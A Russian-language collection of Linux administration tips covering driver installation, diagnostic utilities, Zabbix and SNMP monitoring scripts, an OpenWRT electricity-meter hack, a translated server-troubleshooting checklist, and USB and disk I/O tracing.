1. Скачать ati-driver-installer-8-5-x86.x86_64.run 2. В консоли выполнить для синхронизации списка пакетов, доступных в репозиториях: sudo apt-get update Затем, установить пакеты, необходимые для сборки модуля ядра из исходных текстов и создания deb пакета: sudo apt-get install build-essential fakeroot dh-make debhelper debconf libstdc++5 dkms linux-headers-$(uname -r) 3. В консоли запускаем инсталлятор драйвера в режиме создания пакетов: sudo sh ati-driver-installer-8-5-x86.x86_64.run --buildpkg Ubuntu/8.04 4. Теперь нужно занести в черный список драйвер fglrx из репозитория Ubuntu, выполняем sudo gedit /etc/default/linux-restricted-modules-common и в строке "DISABLED_MODULES" добавляем "fglrx" получаем строку: DISABLED_MODULES="fglrx" сохраняем файл 5. далее в консоли устанавливаем подготовленные пакеты с драйвером: sudo dpkg -i xorg-driver-fglrx_8.493*.deb fglrx-kernel-source_8.493*.deb fglrx-amdcccle_8.493*.deb 6. Перезагружаем X сервер. 7. проверяем: $ fglrxinfo display: :0.0 screen: 0 OpenGL vendor string: ATI Technologies Inc. OpenGL renderer string: Radeon X1900 Series OpenGL version string: 2.1.7537 Release PS: все вышесказанное проверялось на i386 конфигурации с видеокартой X1900, для amd64 возможны небольшие отличая в установке. Оригинал: http://pronix.isgreat.org/news.php?item.86.5

Просмотр состояния и мониторинг системы

Полезные пакеты, которые можно установить на сервер для диагностики сбоев (доп. ссылка 1) [комментарии]

Минимальный набор пакетов для диагностики проблем, которые рекомендуется заранее установить на серверы, чтобы не тратить время на установку дополнительных пакетов или поиск специализированных live-дистрибутивов. Установка диагностических утилит во время сбоя может превратиться в решение отдельной проблемы или потребовать много времени, учитывая то, что во время сбоя может пропадать сетевое соединение, возникнуть проблемы с DNS, наблюдаться большие потери пакетов или снижение полосы пропускания, возникать большие задержки ввода команд из-за высокой нагрузки на CPU или исчерпания памяти, дисковый раздел может быть переведён в режим только для чтения и т.п. Список пакетов для предустановки (названия для Ubuntu) и поставляемые в них диагностические утилиты:
procps - утилиты ps, vmstat, uptime, top
util-linux - dmesg, lsblk, lscpu (общая статистика, информация о блочных устройствах и CPU)
sysstat - iostat, mpstat, pidstat, sar (оценка производительности)
iproute2 - ip, ss, nstat, tc (настройка сети и управление трафиком)
numactl - numastat (статистика по NUMA)
tcpdump - tcpdump (анализ трафика)
linux-tools-common и linux-tools-$(uname -r) - perf, turbostat (профилировние и мониторинг производительности)
bpfcc-tools (bcc) - opensnoop, execsnoop, runqlat, softirqs, hardirqs, ext4slower, ext4dist, biotop, biosnoop, biolatency, tcptop, tcplife, trace, argdist, funccount, profile (диагностика на базе eBPF)
bpftrace - bpftrace, opensnoop, execsnoop, runqlat, biosnoop (диагностика на базе eBPF)
trace-cmd - trace-cmd (CLI-интерфейс для ftrace)
nicstat - nicstat (информация о сетевых устройствах)
ethtool - ethtool (информация о сетевых устройствах)
tiptop - tiptop (PMU/PMC top)
cpuid - cpuid (информация о CPU)
msr-tools - rdmsr, wrmsr (информация о CPU) sudo apt install procps util-linux sysstat iproute2 numactl tcpdump linux-tools-common linux-tools-$(uname -r) bpfcc-tools bpftrace trace-cmd nicstat ethtool tiptop cpuid msr-tools

Трассировка обмена данными через Unix domain socket (доп. ссылка 1) [комментарии]

Для Unix domain socket до сих пор отсутствовал инструмент для захвата или ослеживания содержимого канала связи, наподобие tcpdump для IP. Для решения данной задачи подготовлен новый инструмент udtrace, который реализован в виде разделяемой библиотеки, подключаемой через LD_PRELOAD. Загружаем код из Git: git clone git://git.gnumonks.org/udtrace Собираем командой: make Запускаем интересующее приложение в режиме трасиировки: LD_PRELOAD=libudtrace.os программа Например, чтобы узнать какие данные передаёт systemctl через Unix-сокет при выполнении команды "stat", можно запустить: LD_PRELOAD=libudtrace.so systemctl status >>> UDTRACE: Unix Domain Socket Trace initialized (TITAN support DISABLED) >>> UDTRACE: Adding FD 4 >>> UDTRACE: connect(4, "/run/dbus/system_bus_socket") 4 sendmsg W 00415554482045585445524e414c20 4 sendmsg W 3331333033303330 4 sendmsg W 0d0a4e45474f54494154455f554e49585f46440d0a424547494e0d0a [...] UDTRACE: Removing FD 4 где, * 4 - номер файлового дескриптора * sendmsg - имя системного вызова (кроме sendmsg может быть read, write , readv и т.п.) * R|W - операция чтения или записи (со стороны отслеживаемого процесса) * шестнадцатеричный дамп переданных или полученных данных (отображаются только реально переданные через сокет данные, а не попавшие буфер передачи) Для декодирования шестнадцатеричного дампа можно собрать декодировщики от проекта Osmocom, написанные на языке TTCN-3 с использованием Eclipse TITAN. Для их включения при сборке можно указать флаг make ENABLE_TITAN=1 После чего запускать трассировку строкой вида: LD_LIBRARY_PATH=/usr/lib/titan LD_PRELOAD=libudtrace.so systemctl status

Снятие показаний электросчетчика средствами OpenWRT (доп. ссылка 1) Автор: Аноним [комментарии]

Предупреждение: все что вы делаете на свой страх и риск, так как существует вероятность "окирпичивания" Вашего роутера. Итак, берем роутер TP-LINK TL-WR842ND с прошивкой OpenWrt (на момент написания статьи автор использовал версию CHAOS CALMER 15.05, r46767) По начальной настройке роутера c OpenWrt информации в сети много. (Пример тому толковый ролик Дмитрия Бачило - https://youtu.be/mVbtmjwkpgE ). В OpenWrt должeн быть установлен пакет bc. Создаем директорию: /usr/local/power, где будут хранится данные нашей программы: в файле /usr/local/power/v220 - показания электросчетчика, в файле /usr/local/power/watts - потребляемая мощность. Заменяем файл /etc/rc.button/reset на следующее содержание: #!/bin/sh POWER_LED=/sys/devices/platform/leds-gpio/leds/tp-link:green:system/brightness . /lib/functions.sh if [ "${ACTION}" = "released" ] then echo 0 > $POWER_LED cat $POWER_LED > /usr/local/power/switch else echo 1 > $POWER_LED cat $POWER_LED > /usr/local/power/switch fi return 0 Разбираем роутер, выводим контакты с кнопки reset и подключаем к телеметрическому выходу электросчетчика. Если электросчетчик опломбирован, то подключаем роутер через фоторезистор к светодиоду счетчика. (Тогда в файле /usr/local/power/switch делаем замену echo 0 на echo 1 в шестой строке и echo 1 на echo 0 в девятой строке). Теперь при нажатии (подачи КЗ) кнопки reset будет гореть индикатор "SYS", и в файле /usr/local/power/switch будет "1". При отжатии кнопки (снятии КЗ) соответственно гаснет "SYS" и в файле /usr/local/power/switch будет "0". Создаем файл /usr/local/power/my_power.sh c правом исполнения. В файле my_power.sh редактируем константу MERCURY в зависимости от электросчетчика (32 стоит по умолчанию, работал со счетчиком "Меркурий 201.5", где передаточное число, 3200 имп/кВт*ч) то есть сотая часть значения передаточного числа. содержание файла my_power.sh: #!/bin/sh SWITCH=/usr/local/power/switch MERCURY=32; COUNT=0; BLACK_COUNT=0; let START_TIME=`date +%s` read POWER < /usr/local/power/v220 ; while true do read pressed < $SWITCH if [ "$pressed" = "1" ] ; then if [ "$BLACK_COUNT" = "0" ] ; then let POWER_OFF=0 let BLACK_COUNT=BLACK_COUNT+1 let COUNT=COUNT+1 if [ "$COUNT" = "$MERCURY" ] ; then let END_TIME=`date +%s` let DELTA=$(($END_TIME-$START_TIME)) let WATTS=$((3600/$DELTA)) printf "%g" "$(echo "scale=3; $WATTS/100"|bc )" > /usr/local/power/watts let COUNT=0 POWER=$(echo "scale=2; $POWER+0.01" | bc) let START_TIME=$END_TIME printf "%g" "$(echo "$POWER" )" > /usr/local/power/v220 ; fi fi fi if [ "$pressed" = "0" ]; then let BLACK_COUNT=0 fi done И запускаем командой: /usr/local/power/my_power.sh &

Мониторинг MaxScale в Zabbix Автор: Аноним [комментарии]

Рабочая задача - обеспечить в Zabbix 2.2 мониторинг прокси MaxScale. Пример скрипта "status": #!/usr/bin/php <?php $json_string = `/usr/bin/maxadmin -pmariadb show serversjson`; $obj=json_decode($json_string,true); echo $obj[$argv[1]]["nodeId"]; Добавляем в zabbix_agentd.conf UserParameter=ServerStatus1, /<yourLovePlace>/status 0 UserParameter=ServerStatus2, /<yourLovePlace>/status 1 UserParameter=ServerStatus3, /<yourLovePlace>/status 2 Если серверов больше чем у меня, добавляем новые строчки, параметр увеличиваем на 1. В zabbix ловим -1 это значит сервер не в кластере и идем разбираться. "show serversjson" еще много чего интересного выводит.

Утилиты для диагностики проблем с производительностью и анализа состояния подсистем Linux (доп. ссылка 1) [комментарии]

Плакат с наглядным обзором утилит для диагностики проблем с производительностью и анализа состояния подсистем Linux: (http://www.brendangregg.com/Perf/linux_observability_tools.png) Утилиты для оптимизации производительности: (http://www.brendangregg.com/Perf/linux_tuning_tools.png) Утилиты для измерения производительности: (http://www.brendangregg.com/Perf/linux_benchmarking_tools.png) Использование утилиты sar: (http://www.brendangregg.com/Perf/linux_observability_sar.png)

Мониторинг температуры в Zabbix с использованием Digitemp Автор: Denis Romanov [комментарии]

Получаем параметр от 1-Wire датчика температуры DS18S20 и передаем на сервер Zabbix. Проверить доступные устройства: /usr/bin/digitemp_DS9097 -w -s /dev/rs232-0 -v -a Devices on the Main LAN 10CD91160208005C : DS1820/DS18S20/DS1920 Temperature Sensor 0167C0180E000089 : DS2401/DS1990A Serial Number iButton Поискать термодатчики: /usr/bin/digitemp_DS9097 -i -s /dev/rs232-0 -v -a Searching the 1-Wire LAN 10CD91160208005C : DS1820/DS18S20/DS1920 Temperature Sensor ROM #0 : 10CD91160208005C Cоздание файла настроек (создает /etc/digitemp.conf) /usr/bin/digitemp_DS9097 -i -s /dev/rs232-0 -q -c /etc/digitemp.conf Получить температуру: /usr/bin/digitemp_DS9097 -c /etc/digitemp.conf -t 0 DigiTemp v3.5.0 Copyright 1996-2007 by Brian C. Lane GNU Public License v2.0 - http://www.digitemp.com Feb 05 10:23:54 Sensor 0 C: 38.56 F: 101.41 Напечатать температуру: /usr/bin/digitemp_DS9097 -c /etc/digitemp.conf -t 0 -q Feb 05 10:25:21 Sensor 0 C: 38.56 F: 101.41 Напечатать температуру в градусах цельсия /usr/bin/digitemp_DS9097 -c /etc/digitemp.conf -t 0 -q | awk '{print $7}' 38.56 Часть из файла настроек агента Zabbix /etc/zabbix/zabbix_agentd.conf (передавать на сервер параметр) UserParameter=log.temperatur.ttys0, /etc/zabbix/temperature файла /etc/zabbix/temperatur (получить с правами пользователя Zabbix) #!/bin/bash cat /var/log/temperatur.ds18s20 Опрос 1 раз в 5 минут Строка из файла "планировщика заданий" /etc/crontab (получить данные из RS-232 c правами ROOT) */5 * * * * root digitemp_DS9097 -c /etc/digitemp.conf -t 0 -q | awk '{print $7}' > /var/log/temperatur.ds18s20 На сервере ZABBIX: получить от клиента параметр / zabbix_get -s 127.0.0.1 -k "log.temperatur.ttys0" 38.50 Теперь нужно привязать к хоту и вывести на экран график Создаем "Item" , со временем опроса 600 секунд (5 минут) Создаем "Graph", который нам нарисует "Item" Результат:

Мониторинг репликации MySQL при помощи Zabbix Автор: globus [комментарии]

0. Кому как удобно ставим zabbix агента. Создаем директорию /zabix/ 1. Создаем пользователя на слейве mysql. GRANT REPLICATION CLIENT ON *.* TO 'replication'@'localhost' IDENTIFIED BY 'S0mEPass'; 2. пишем скрипт slave_status #!/bin/sh export PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin: mysql --defaults-file=/zabix/.my.cnf -Bse "show slave status\\G" | grep $1 | awk '{ print $2 }' | head -n 1 3. Делаем конфиг /zabbix/.my.cnf [client] user=replication host=localhost password='S0mEPass' Конфиг нужен затем, чтобы в вывод не попадали такие сообщения: Warning: Using a password on the command line interface can be insecure. Yes 4. В конфиг zabbix агента добавляем UserParameter=mysql-slave[*],/scripts/slave_status "$1" 5. Делаем рестарт zabbix агента Забираем (http://opennet.ru/soft/zbx_export_templates.xml или https://cloud.mail.ru/public/2feb5f4dee82/zbx_export_templates.xml ) шаблон для zabbix (работает на 2.2), в шаблоне три параметра и два триггера. Допиливаем под себя, не забываем делать рестарты.

Первые 5 минут устранения неполадок на Linux-сервере (доп. ссылка 1) Автор: Ivan Pesin [комментарии]

Когда наша команда еще занималась вопросами эксплуатации, оптимизации и масштабирования в предыдущей компании, нам приходилось иметь дело с отладкой медленно работающих приложений и целых инфраструктур, часто большого размера (представьте CNN или the World Bank). Горящие сроки, экзотические стеки технологий и недостаток информации обычно гарантировали незабываемые впечатления. Причины неполадок редко были очевидными; ниже я привожу список шагов, с которых мы обычно начинали поиск проблемы. Войдите немного в контекст Не спешите бросаться на сервера, сперва нужно выяснить, что уже известно о системе и специфике проблемы. Не стоит тратить время на поиск проблемы вслепую. Несколько обязательных вопросов, требующих ответа:
Какие конкретно наблюдаются симптомы? Подвисания? Ошибки?
Когда проблема была замечена впервые?
Воспроизводится ли она?
Есть ли закономерность (например, происходит каждый час)?
Какие были последние изменения в системе (код, сервисы, стек приложений)?
Влияет ли проблема на определенную группу пользователей (авторизированных, не авторизированных, с общим географическим расположением...)?
Имеется ли документация на архитектуру (физическую и логическую)?
Используется ли система мониторинга? Munin, Zabbix, Nagios, New Relic... Подойдет любая.
Ведется ли (централизированное) журналирование? Loggly, Airbrake, Graylog.. Последние два пункта представляют собой наиболее удобные источники информации, но не возлагайте на них больших надежд: как ни печально, именно мониторинг и журналирование часто отсутствуют. Если не повезло, сделайте заметку, что это нужно поправить, и двигайтесь дальше. Кто здесь? $ w $ last Не критично, но обычно не стоит заниматься устранением неполадок в системе, в то время когда с ней играются другие люди. На кухне достаточно одного повара. Что делали в системе? $ history Всегда полезно посмотреть на историю команд в комбинации с информацией о том, кто ранее заходил в систему. Не забывайте про ответственность: то, что вы администратор, не дает вам права нарушать чужую конфиденциальность. Маленькая заметка в уме на потом - вы можете задать переменную окружения HISTTIMEFORMAT, чтобы была возможность отслеживать время, когда выполнялись команды из истории. Нет ничего более раздражающего, чем анализ устаревшего списка команд, не имеющих отношения к проблеме... Что запущено? $ pstree -a $ ps aux Вывод ps aux содeржит, как правило, много подробной информации о процессах, тогда как pstree -a выдает наглядную и лаконичную картину запущенных процессов, вместе с родительской иерархией. "Слушающие" сервисы $ netstat -ntlp $ netstat -nulp $ netstat -nxlp Я предпочитаю выполнять эти команды отдельно, в основном потому что я не люблю смотреть на все сервисы одновременно. Тем не менее, netstat -nalp тоже подойдет и я бы не опускал опцию -n (IP-адреса, мне кажется, воспринимаются лучше). Определите запущенные службы и выясните должны ли они выполнятся. Посмотрите какие порты находятся в слушающем состоянии. PID слушающего процесса можно всегда найти в выводе ps aux. Это может оказаться очень полезным, особенно когда в системе одновременно запущены несколько Java или Erlang процессов. Обычно, мы стараемся, чтобы наши системы были более или менее специализированы, с небольшим количеством сервисов на каждой из них. Если вы видите десятки слушающих портов, наверно стоит отметить это себе в уме, чтобы потом разобраться как это можно почистить или реорганизовать. Процессор и память $ free -m $ uptime $ top $ htop Эти команды должны ответить на несколько вопросов:
Есть ли свободная память? Происходит ли своппинг на диск?
Насколько загружены процессоры? Сколько ядер доступно на сервере? Перегружены ли какие-то из них?
Что больше всего нагружает систему? Какое у системы значение средней нагрузки (load average)? Аппаратная часть $ lspci $ dmidecode $ ethtool Обычные, невиртуализированные сервера продолжают широко использоваться, и эти команды должны помочь:
Определить RAID-контроллер (есть ли у него батарея резервного питания?), процессор и количество доступных слотов памяти. Это может подсказать вам потенциальные причины проблемы и пути увеличения производительности.
Выяснить правильно ли настроена сетевая карта? Не работает ли она в режиме полудуплекса? На скорости 10MBps? Есть ли ошибки приема-передачи? +++ Производительность ввода-вывода $ iostat -kx 2 $ vmstat 2 10 $ mpstat 2 10 $ dstat --top-io --top-bio Очень полезные команды для анализа общей производительности системы хранения.
Проверяем свободное место: есть ли в системе полностью занятые файловые системы или диски?
Используется ли своп (si/so)?
Что занимает процессор: системные вызовы? пользовательские процессы? много ли времени крадется гипервизором (VM)?
Моя любимая команда - dstat. Какие процессы интенсивно используют ввод-вывод? Может быть MySQL грузит дисковую подсистему? Или это какой-то PHP-скрипт? Точки монтирования и файловые системы $ mount $ cat /etc/fstab $ vgs $ pvs $ lvs $ df -h $ lsof +D / /* будьте осторожны, не положите сервер */
Сколько файловых систем смонтировано?
Есть ли файловые системы, выделенные для конкретных сервисов? (MySQL например?)
Какие указаны опции монтирования: noatime? default? Есть ли какие-то файловые системы смонтированные в режиме только для чтения?
Есть ли свободное место на дисках?
Нет ли больших удаленных файлов, которые продолжают удерживаться каким-либо процессом?
Есть ли место для расширения раздела, если проблема в свободном пространстве? Ядро, прерывания и сеть $ sysctl -a | grep ... $ cat /proc/interrupts $ cat /proc/net/ip_conntrack /* может занять некоторое время на загруженных серверах */ $ netstat $ ss -s
Распределены ли прерывания равномерно по всем процессорам? Возможно одно из ядер перегружено из-за прерываний от сетевой карты, RAID-контроллера, ...?
Какое задано значение swappinness в системе? 60 подходит для персональных компьютеров, но не для серверов. Желательно, чтобы сервер никогда не использовал своп, иначе во время чтения/записи данных на диск, процессы вытесненные в своп окажутся заблокированными.
Достаточно ли велико значение conntrack_max для существующего трафика?
Как долго TCP-соединения могут находится в различных состояниях (TIME_WAIT, ...)?
netstat может быть немного медленным при выводе всех существующих соединений, тогда используйте ss -s, чтобы быстро получить краткую статистику. Посмотрите статью про настройку TCP в Linux, в ней есть полезная информация на эту тему. Системные журналы и сообщения ядра $ dmesg $ less /var/log/messages $ less /var/log/secure $ less /var/log/auth
Ищите любые сообщение об ошибках или предупреждения. Есть ли сообщения о слишком большом количестве соединений в conntrack?
Есть ли сообщения об аппаратных ошибках или ошибках файловой системы?
Коррелируется ли время между ошибками в журналах и предоставленной информацией о проблеме? Задания cron $ ls /etc/cron* + cat $ for user in $(cat /etc/passwd | cut -f1 -d:); do crontab -l -u $user; done
Есть ли задания, которые выполняются слишком часто?
Есть ли персональные конфигурационные файлы cron, спрятанные от постороннего взгляда?
Выполнялось ли какое-либо резервное копирование в то время, когда возникла проблема? Журнальные файлы приложений Здесь можно много что исследовать, но вряд ли у вас будет время, чтобы детально все просмотреть. Поэтому, сконцентрируйтесь на самом очевидном, например для LAMP-сервера:
Apache & Nginx; посмотрите журналы доступа и ошибок, ищите ошибки 5xx, возможные ошибки limit_zone.
MySQL; посмотрите есть ли ошибки в mysql.log, следы поврежденных таблиц, работающий процесс восстановления innodb. Посмотрите журнал медленных операций и определите есть ли проблемы с диском, индексами или запросами.
PHP-FPM; если включен журнал php-slow, покопайтесь в нем и попробуйте найти ошибки (php, mysql, memcache, ...). Если журнал выключен, активируйте его.
Varnish; проверьте отношение hit/miss в varnishlog и varnishstat. Не пропущено ли правило в конфигурации, в результате чего запросы конечных пользователей проходят до бекэнда, минуя varnish?
HA-Proxy; какой статус у бекэндов? Правильно ли работает проверка здоровья бекэндов? Не переполнена ли очередь запросов на фронтэнде или бекэндах? Заключение После этих первых пяти минут (плюс-минус десять), у вас должно будет сформироваться более полное понимание ситуации:
Что запущено.
Связана ли проблема с вводом-выводом/аппаратной частью/сетевой подсистемой или конфигурацией (плохой код, настройки ядра, ...).
Есть ли знакомые шаблоны: плохое использование индексов БД, слишком много процессов apache, и т.п. Вы даже могли уже найти непосредственную причину проблемы. Если нет, то вы находитесь в хорошей позиции для дальнейших поисков, зная, что все очевидное уже проверено. Оригинал: First 5 Minutes Troubleshooting A Server by Vincent Viallet, 6 March 2013. Translated by Ivan Pesin, July 2013

Мониторинг загрузки многоядерного сервера по каждому ядру в отдельности в Linux Автор: fantom [комментарии]

Исходная задача: по SNMP загрузить параметры загруженности CPU с сервера по каждому ядру в отдельности (ОС Linux). Простое решение: Необходимые данные можно получить из файла /proc/stat Описание структуры файла было вскоре найдено здесь http://www.linuxhowtos.org/System/procstat.htm И так же был обнаружен простенький пример реализации (shell скрипт): http://colby.id.au/node/39 Осталось все это прикрутить к SNMP. У SNMP есть чудесная возможность - создать свой OID и прицепить к нему все что угодно :) 1. Пишем скрипт, в простейшем варианте выглядящий примерно так: #!/bin/bash PREV_TOTAL0=0 PREV_TOTAL1=0 PREV_IDLE0=0 PREV_IDLE1=0 while true; do CPU0=(`cat /proc/stat | grep '^cpu0 '`) # Общая картинка по cpu0 CPU1=(`cat /proc/stat | grep '^cpu1 '`) # Общая картинка по cpu1 unset CPU0[0] # отрезаем первый столбец (cpu0) unset CPU1[0] # отрезаем первый столбец (cpu1) IDLE0=${CPU0[4]} # время простоя cpu0. IDLE1=${CPU1[4]} # время простоя cpu1. # Подсчитаем суммарное время по cpu0 TOTAL0=0 for VALUE0 in "${CPU0[@]}"; do let "TOTAL0=$TOTAL0+$VALUE0" done # Подсчитаем суммарное время по cpu1 TOTAL1=0 for VALUE1 in "${CPU1[@]}"; do let "TOTAL1=$TOTAL1+$VALUE1" done # Подсчитаем дельту с момента последнего замера по CPU0. let "DIFF_IDLE0=$IDLE0-$PREV_IDLE0" let "DIFF_TOTAL0=$TOTAL0-$PREV_TOTAL0" # Вычисляем процент использования CPU0 let "DIFF_USAGE0=(1000*($DIFF_TOTAL0-$DIFF_IDLE0)/$DIFF_TOTAL0+5)/10" # Подсчитаем дельту с момента последнего замера по CPU1. let "DIFF_IDLE1=$IDLE1-$PREV_IDLE1" let "DIFF_TOTAL1=$TOTAL1-$PREV_TOTAL1" # Вычисляем процент использования CPU1 let "DIFF_USAGE1=(1000*($DIFF_TOTAL1-$DIFF_IDLE1)/$DIFF_TOTAL1+5)/10" #Результаты пишем в файлик echo "$DIFF_USAGE0">/opt/cpu_load echo "$DIFF_USAGE1">>/opt/cpu_load # Запоминаем текущее состояние, понадобиться при следующем цикле PREV_TOTAL0="$TOTAL0" PREV_TOTAL1="$TOTAL1" PREV_IDLE0="$IDLE0" PREV_IDLE1="$IDLE1" #exit # Собственно пауза перед следующим замером... sleep 59 done В файл конфигурации /etc/snmpd.conf добавляем строчку например такого вида exec .1.3.6.1.4.1.2021.54 cpu /bin/cat /opt/cpu_load Что нам это дает (после перезапуска/запуска snmpd): snmpwalk -v 2c -c <community> <server_name> 1.3.6.1.4.1.2021.54 UCD-SNMP-MIB::ucdavis.54.1.1 = INTEGER: 1 UCD-SNMP-MIB::ucdavis.54.2.1 = STRING: "cpu" UCD-SNMP-MIB::ucdavis.54.3.1 = STRING: "/bin/cat /opt/cpu_load" UCD-SNMP-MIB::ucdavis.54.100.1 = INTEGER: 0 UCD-SNMP-MIB::ucdavis.54.101.1 = STRING: "1" UCD-SNMP-MIB::ucdavis.54.101.2 = STRING: "2" Собственно UCD-SNMP-MIB::ucdavis.54.101.1 = STRING: "1 - загрузка CPU0 UCD-SNMP-MIB::ucdavis.54.101.2 = STRING: "2" - загрузка CPU1 Осталось добавить это в рисовалку и все.

Раскраска лога для увеличения его наглядности [комментарии]

Для наблюдения за логом в наглядном виде с подсветкой наиболее важных элементов или для раскрашивания файлов конфигурации или файлов с кодом удобно использовать утилиту ccze, которая присутствует в стандартных репозиториях. Раскрасим поступающий хвост лога: tail -f /var/log/syslog | ccze Просмотрим весь лог (опция -A использует вывод в ANSI-кодах, в не через ncurses; опция -R в less включает интерпретацию ANSI-кодов): ccze -A < /var/log/syslog | less -R Для вывода в формате HTML следует указать опцию "-h". Если в логе есть время в эпохальном виде, то его можно преобразовать в наглядное представление через опцию "-C". Для определения своего цвета для заданного ключевого слова можно использовать флаг "--color ключ=цвет". Примеры раскраски вывода утилит (в качестве аналога можно упомянуть утилиту acoc): df -hT | ccze -A ls -l | ccze -A Для наглядного наблюдения за несколькими логами можно использовать MultiTail (http://www.vanheusden.com/multitail/). Автором MultiTail также подготовлено несколько полезных утилит: MySQLtail - слежение изменением содержимого заданной таблицы в MySQL; NagTail - наглядное отображение изменений в логе системы мониторинга Nagios; RSSTail - отображение обновления RSS-лент в стиле tail;

Скрипт для наглядного ping с ведением лога Автор: Kins [комментарии]

Представленный скрипт может: * Отображать результат пинга * Отображать время пинга * Вести лог пингов * Визуализировать лог пингов * Подавать звуковой сигнал при отсутствии пинга Код скрипта conky.sh: #!/bin/bash #$1 - name #$2 - adress #$3 - options (f: format result, n: show name, t: show time, d: show colored dot, s: play sound, l: logging) #$4 - width in symbol #$5 - fill symbol #$6 - sound file #$7 - packetsize if [ "$7" != "" ] then tmp=-s' '$7 fi a=$(ping -c 1 $2 -W 1 $tmp) if [ "$a" = "" ] then r='e' t=Ꝏ fi if [[ "$a" =~ [0-9]*% ]]; then tmp=$BASH_REMATCH; fi if [ "$tmp" = "0%" ] then r='y' if [[ "$a" =~ time=[0-9.]*.ms ]]; then t=$BASH_REMATCH; fi t=${t#time=} t=${t% ms} elif [ "$tmp" = "100%" ] then r='n' t=Ꝏ fi vislog='' #функция визуализации и ведения лога function vis_log { # Проверка наличия файла. if [ ! -f "$2" ] then #echo "Файл "$2" не найден. Создаем..." > $2 fi #сколько строк лога нужно визуализировать? tmp='' if [[ "$3" =~ n ]]; then tmp=$1' '; fi if [[ "$3" =~ t ]]; then tmp=$tmp' '$t; fi if [[ "$3" =~ d ]]; then tmp=$tmp' '$r; fi cnt=${#tmp} let cnt=$4-$cnt #считать из лога нужное количество строк tmp=$(tail -n $cnt $2) #парсим считанные строки sym='' oldsym='' for ((i=1; i <= cnt ; i++)) do if [[ "$tmp" =~ [eyn] ]]; then sym=$BASH_REMATCH; fi tmp=${tmp#*d} if [ "$sym" != "$oldsym" ] then case "$sym" in y) vislog=$vislog'${color green}';; n) vislog=$vislog'${color red}';; e) vislog=$vislog'${color yellow}';; esac fi oldsym=$sym vislog=$vislog$5 done #записали новый результат пинга в лог echo "$r $t"$(date +%x' % '%X)' d' >> $2 #типа ротация лога оставляем только последние $4 строк tail -n $4 $2 > temp.txt rm $2 mv temp.txt $2 } #сыграем звук если надо if [[ "$3" =~ s ]]; then if [ "$r" != 'y' ] then play $6 -q & fi; fi #окончательное оформление для conky res='' if [[ "$3" =~ l ]]; then vis_log $1 $2 $3 $4 $5; fi if [[ "$3" =~ n ]]; then res=$1' '; fi if [[ "$3" =~ f ]]; then res=$res' '$vislog; fi if [[ "$3" =~ t ]]; then res=$res'${color} '$t; fi r=${r//y/'${color 00ff00}'⬤} r=${r//n/'${color ff0000}'⬤} r=${r//e/'${color ffff00}'⬤} if [[ "$3" =~ d ]]; then res=$res' '$r; fi echo $res В скрипт надо передать 7 параметров: 1- Отображаемое имя того, что пингуем (может не совпадать с адресом и вообще это просто строка от которой работа скрипта не зависит) 2- Пингуемый адрес (х.х.х.х либо example.com) 3- Флаги настроек: f - форматировать вывод (без флага ведения лога бессмысленно) n - отображать имя t - отображать время пинга (ms) d - отображать жирную точку текущего результата s - проиграть звук при отсутствии пинга l - вести лог 4- Общая ширина строки в символах для форматирования 5- Символ которым будет заполняться пространство для форматированного вывода, также цветом этого символа будет отображаться лог 6- Имя звукового файла (необязательный параметр нужен для флага s, почему то путь у меня не работал пришлось файл бросить в домашний каталог) 7- Длинна пакета для пинга (совсем не обязательный параметр, но очень просили) Пример конфигурации conky: {execpi 10 /home/kinsoft/conky_ping5.sh Inet 8.8.8.8 fntdls 32 . drip.ogg} отображать имя, время пинга, лог, текущий результат; играть звук; вести лог; форматировать строку и делать ее шириной 32 знака.

Выявление нагружающих дисковую подсистему процессов в Linux Автор: Yuriy Kulikov [комментарии]

В Centos 5.x нет нормальной поддержки iotop, без которого трудно понять, какой процесс больше всего грузит дисковую систему. Но можно использовать скрипт disktop.stp, написанный для подсистемы динамической трассировки SystemTap. Чтобы запустить disktop в CentOS нужно: Установить пакеты kernel-debuginfo-`uname -r` kernel-debuginfo-common-`uname -r` (скачать можно здесь http://debuginfo.centos.org/5/ Установить пакет kernel-devel-`uname -r` Установить systemtap: yum install systemtap Запуcтить disktop: stap disktop.stp Пример работы: # stap disktop.stp Wed Nov 24 16:16:20 2010 , Average: 351Kb/sec, Read: 1680Kb, Write: 76Kb UID PID PPID CMD DEVICE T BYTES 102 16196 29589 nginx sda3 R 539535 48 29429 26950 httpd sda3 R 161992 48 29427 26950 httpd sda3 R 141730 48 20089 26950 httpd sda3 R 100256 102 16196 29589 nginx sda3 W 57253

Мониторинг активности USB-устройств [комментарии]

Начиная с Linux-ядра версии 2.6.11 в составе поставляется модуль usbmon, позволяющий осуществить полный мониторинг обмена данными с USB-устройствами. Загружаем модуль: modprobe usbmon Если не смонтирована debugfs, монтируем: mount| grep debugfs mount -t debugfs none_debugs /sys/kernel/debug Для анализа USB-пересылок также можно использовать Java-приложение из состава пакета USBMon-0.4.tar.gz: wget http://people.redhat.com/zaitcev/linux/USBMon-0.4.tar.gz tar xzf USBMon-0.4.tar.gz cd USBMon vi Makefile # правим путь в переменной JAVAC, оставляем просто javac (ставится из пакета openjdk-6-jdk) make java USBMon Но удобнее, проще и нагляднее анализировать usbmon трафик в Wireshark, в котором достаточно выбрать интерфейс для сниффинга usbmon0 или usbmonN, где N номер USB-шины, которую можно определить, например, утилитой lsusb. Главное удобство Wireshark состоит в гибких возможностях фильтрации, например, можно отобразить только соответствующие определенным критериям пересылки. При наличии libpcap 1.0 для перехвата данных можно использовать любую поддерживающую данную библиотеку утилиту, включая tcpdump, начиная с версии 4.0: tcpdump -i usbmon0 -w usb.pcap указание опции "-w" обязательно, без нее будет выведена ошибка "tcpdump: unsupported data link type USB_LINUX". Наглядно отслеживать пересылки tcpdump еще не умеет, но сохраненный файл usb.pcap можно использовать в сторонних анализаторах, таких как wireshark. Сохранить дамп пересылок можно в текстовом виде, просто перенаправив вывод из сокета в директории /sys/kernel/debug/usb/usbmon: ls /sys/kernel/debug/usb/usbmon 0s 1s 1u 2t 3s 3u 4t 5s 5u 6t 7s 7u 0u 1t 2s 2u 3t 4s 4u 5t 6s 6u 7t где, 0* - сокет сбора данных о всех шинах. Буквы "s", "u" и "t" указывают на формат вывода, отличающийся детализацией. cat /sys/kernel/debug/usb/usbmon/0u > usbmon.out

Борьба с kernel panic в Linux-ядре 2.6.35 и выше Автор: Аноним [комментарии]

